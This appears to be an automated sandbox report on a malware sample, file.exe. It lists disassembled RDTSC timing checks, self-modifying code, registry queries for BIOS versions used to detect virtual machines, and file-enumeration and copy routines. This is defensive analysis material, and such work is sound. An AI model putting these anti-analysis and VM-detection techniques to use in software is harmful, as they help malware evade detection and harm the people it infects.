              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4A3F second address: 12A4A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51EDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FD7F8DB51F1h 0x00000013 pop eax 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12A4756 second address: 12A4766 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7F8BAA156h 0x00000008 jnp 00007FD7F8BAA156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B107D second address: 12B109C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD7F8DB51E6h 0x00000008 jmp 00007FD7F8DB51EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007FD7F8DB51EEh 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B11D7 second address: 12B1201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD7F8BAA165h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD7F8BAA15Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1201 second address: 12B1205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1205 second address: 12B121A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B121A second address: 12B1220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B1220 second address: 12B1226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B3649 second address: 12B364F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12B364F second address: 12B365F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8BAA15Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA6B0 second address: 12BA6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BA6B7 second address: 12BA6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12BD60E second address: 12BD612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C7954 second address: 12C795E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD7F8BAA162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CE815 second address: 12CE81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD470 second address: 12CD474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD5F0 second address: 12CD5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD7F8DB51E6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CD87A second address: 12CD880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA05 second address: 12CDA09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA09 second address: 12CDA40 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FD7F8BAA156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD7F8BAA165h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD7F8BAA162h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA40 second address: 12CDA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA44 second address: 12CDA6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA161h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jo 00007FD7F8BAA162h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA6B second address: 12CDA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD7F8DB51E6h 0x0000000a jmp 00007FD7F8DB51EAh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12CDA83 second address: 12CDA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D3599 second address: 12D35A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3685 second address: 12E368B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E368B second address: 12E3691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3691 second address: 12E3696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E354E second address: 12E3552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E3552 second address: 12E3558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4EBD second address: 12E4EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12E4EC1 second address: 12E4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD7F8BAA160h 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE112 second address: 12DE15D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c jmp 00007FD7F8DB51EFh 0x00000011 jns 00007FD7F8DB51F6h 0x00000017 popad 0x00000018 push esi 0x00000019 jmp 00007FD7F8DB51F4h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12DE15D second address: 12DE163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13086B1 second address: 13086B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13086B7 second address: 13086BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13074FC second address: 1307533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FD7F8DB51EAh 0x00000012 jmp 00007FD7F8DB51F6h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307533 second address: 1307538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307538 second address: 130753E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13077E5 second address: 13077EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13077EB second address: 13077F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13077F6 second address: 13077FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307AF9 second address: 1307B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD7F8DB51F1h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B12 second address: 1307B26 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e js 00007FD7F8BAA156h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B26 second address: 1307B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307B2A second address: 1307B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307DE5 second address: 1307DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51EEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307F68 second address: 1307F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD7F8BAA156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1307F74 second address: 1307F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F7h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13080FC second address: 1308100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309CE2 second address: 1309CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309CE8 second address: 1309CFE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD7F8BAA156h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FD7F8BAA156h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309CFE second address: 1309D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309D02 second address: 1309D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C558 second address: 130C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C55C second address: 130C571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C571 second address: 130C576 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C8D3 second address: 130C8D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C8D9 second address: 130C90E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or dl, 00000056h 0x0000000e push 00000004h 0x00000010 movsx edx, bx 0x00000013 call 00007FD7F8DB51E9h 0x00000018 jng 00007FD7F8DB51EAh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD7F8DB51ECh 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C90E second address: 130C920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8BAA15Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C920 second address: 130C939 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7F8DB51E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130C939 second address: 130C93D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F48B second address: 130F491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0247 second address: 51F024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F024D second address: 51F0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0251 second address: 51F0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0255 second address: 51F0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c popad 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7F8DB51F9h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0280 second address: 51F0286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F0286 second address: 51F028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F028A second address: 51F028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F028E second address: 51F029E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F029E second address: 51F02A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02A2 second address: 51F02B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02B2 second address: 51F02C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8BAA15Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F02FF second address: 51F031E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FD7F8DB51F9h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F031E second address: 51F03BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, ax 0x0000000e pushfd 0x0000000f jmp 00007FD7F8BAA15Ah 0x00000014 or esi, 05BB6CA8h 0x0000001a jmp 00007FD7F8BAA15Bh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 mov dx, FF4Ah 0x00000027 pushfd 0x00000028 jmp 00007FD7F8BAA15Bh 0x0000002d or ax, 81EEh 0x00000032 jmp 00007FD7F8BAA169h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FD7F8BAA15Ch 0x00000041 adc eax, 6E820168h 0x00000047 jmp 00007FD7F8BAA15Bh 0x0000004c popfd 0x0000004d popad 0x0000004e mov ebp, esp 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FD7F8BAA160h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03BB second address: 51F03CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7F8DB51EEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03CD second address: 51F03F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD7F8BAA169h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03F3 second address: 51F03F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F03F9 second address: 51F03FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 124B924 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1233D83 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 107F805 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12A6CB6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27491
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26309
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E418A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E43910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E43910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E423A9
